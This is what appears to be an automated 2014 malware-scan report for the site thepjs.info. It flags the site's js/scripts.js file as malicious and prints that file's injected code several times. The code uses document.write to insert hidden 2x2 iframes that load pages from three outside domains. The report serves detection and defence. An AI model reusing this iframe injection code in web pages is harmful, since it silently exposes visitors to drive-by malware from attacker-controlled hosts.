Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=thepjs.info
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://thepjs.info/ | 200 OK Content-Length: 2855 Content-Type: text/html | clean |
http://thepjs.info/js/scripts.js | 200 OK Content-Length: 3031 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: redsirenwebsolutions.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://schiedsrichterge.bplaced.net/acwf.html?j=1265211></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1272707></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1272707></iframe>'); var loadedobjects="" var rootdomain="http://"+window.location.hostname function GetPage(url, containerid) { var page_request; try { page_request = new XM ...[2394 bytes skipped]... Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://schiedsrichterge.bplaced.net/acwf.html?j=1265211></iframe><iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1272707></iframe><iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1272707></iframe> Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmi.html?j=1272707 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1272707> Malicious iFrame found. size: 2x2 src: http://redsirenwebsolutions.com/mwed.html?j=1272707 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1272707> Hidden iFrame found. size: 2x2 src: http://schiedsrichterge.bplaced.net/acwf.html?j=1265211 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://schiedsrichterge.bplaced.net/acwf.html?j=1265211> | ||
http://thepjs.info/./admin | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 04 Jul 2014 07:22:14 GMT Location: http://thepjs.info/admin/ Server: Apache Content-Length: 294 Content-Type: text/html; charset=iso-8859-1 | clean |
http://thepjs.info/admin/ | 200 OK Content-Length: 1935 Content-Type: text/html | clean |
http://thepjs.info/admin/../js/scripts.js | 200 OK Content-Length: 3031 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: redsirenwebsolutions.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://schiedsrichterge.bplaced.net/acwf.html?j=1265211></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1272707></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1272707></iframe>'); var loadedobjects="" var rootdomain="http://"+window.location.hostname function GetPage(url, containerid) { var page_request; try { page_request = new XM ...[2394 bytes skipped]... Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://schiedsrichterge.bplaced.net/acwf.html?j=1265211></iframe><iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1272707></iframe><iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1272707></iframe> Hidden iFrame found. size: 2x2 src: http://schiedsrichterge.bplaced.net/acwf.html?j=1265211 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://schiedsrichterge.bplaced.net/acwf.html?j=1265211> Malicious iFrame found. size: 2x2 src: http://redsirenwebsolutions.com/mwed.html?j=1272707 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1272707> Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmi.html?j=1272707 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1272707> | ||
http://thepjs.info/./index.php?maa=Forgot_pwd | 200 OK Content-Length: 2855 Content-Type: text/html | clean |
http://thepjs.info/./js/scripts.js | 200 OK Content-Length: 3031 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: redsirenwebsolutions.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://schiedsrichterge.bplaced.net/acwf.html?j=1265211></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1272707></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1272707></iframe>'); var loadedobjects="" var rootdomain="http://"+window.location.hostname function GetPage(url, containerid) { var page_request; try { page_request = new XM ...[2394 bytes skipped]... Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://schiedsrichterge.bplaced.net/acwf.html?j=1265211></iframe><iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1272707></iframe><iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1272707></iframe> Malicious iFrame found. size: 2x2 src: http://redsirenwebsolutions.com/mwed.html?j=1272707 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1272707> Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmi.html?j=1272707 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1272707> Hidden iFrame found. size: 2x2 src: http://schiedsrichterge.bplaced.net/acwf.html?j=1265211 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://schiedsrichterge.bplaced.net/acwf.html?j=1265211> | ||
http://thepjs.info/././admin | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 04 Jul 2014 07:22:16 GMT Location: http://thepjs.info/admin/ Server: Apache Content-Length: 294 Content-Type: text/html; charset=iso-8859-1 | clean |
http://thepjs.info/test404page.js | 404 Not Found Content-Length: 392 Content-Type: text/html | clean |
http://thepjs.info/./users.php | 200 OK Content-Length: 2788 Content-Type: text/html | clean |
http://thepjs.info/./users.php?maa=Register | 200 OK Content-Length: 16244 Content-Type: text/html | clean |
http://thepjs.info/./users.php?maa=Contact | 200 OK Content-Length: 3031 Content-Type: text/html | clean |
http://thepjs.info/./index.php | 200 OK Content-Length: 2855 Content-Type: text/html | clean |
http://thepjs.info/./users.php?maa=terms | 200 OK Content-Length: 19711 Content-Type: text/html | clean |
http://thepjs.info/./users.php?maa=privacy | 200 OK Content-Length: 11699 Content-Type: text/html | clean |
http://thepjs.info/./users.php?maa=Forgot_pwd | 200 OK Content-Length: 2503 Content-Type: text/html | clean |
http://thepjs.info/./../users.php?maa=terms | 500 Status read failed: Соединение ÑазоÑвано дÑÑгой ÑÑоÑоной Content-Length: 140 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: thepjs.info
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 04 Jul 2014 07:22:12 GMT
Server: Apache
Content-Type: text/html
GET / HTTP/1.1
Host: thepjs.info
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 04 Jul 2014 07:22:12 GMT
Server: Apache
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: thepjs.info
Referer: http://www.google.com/search?q=thepjs.info
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: thepjs.info
Referer: http://www.google.com/search?q=thepjs.info
Result:
The result is similar to the first query. There are no suspicious redirects found.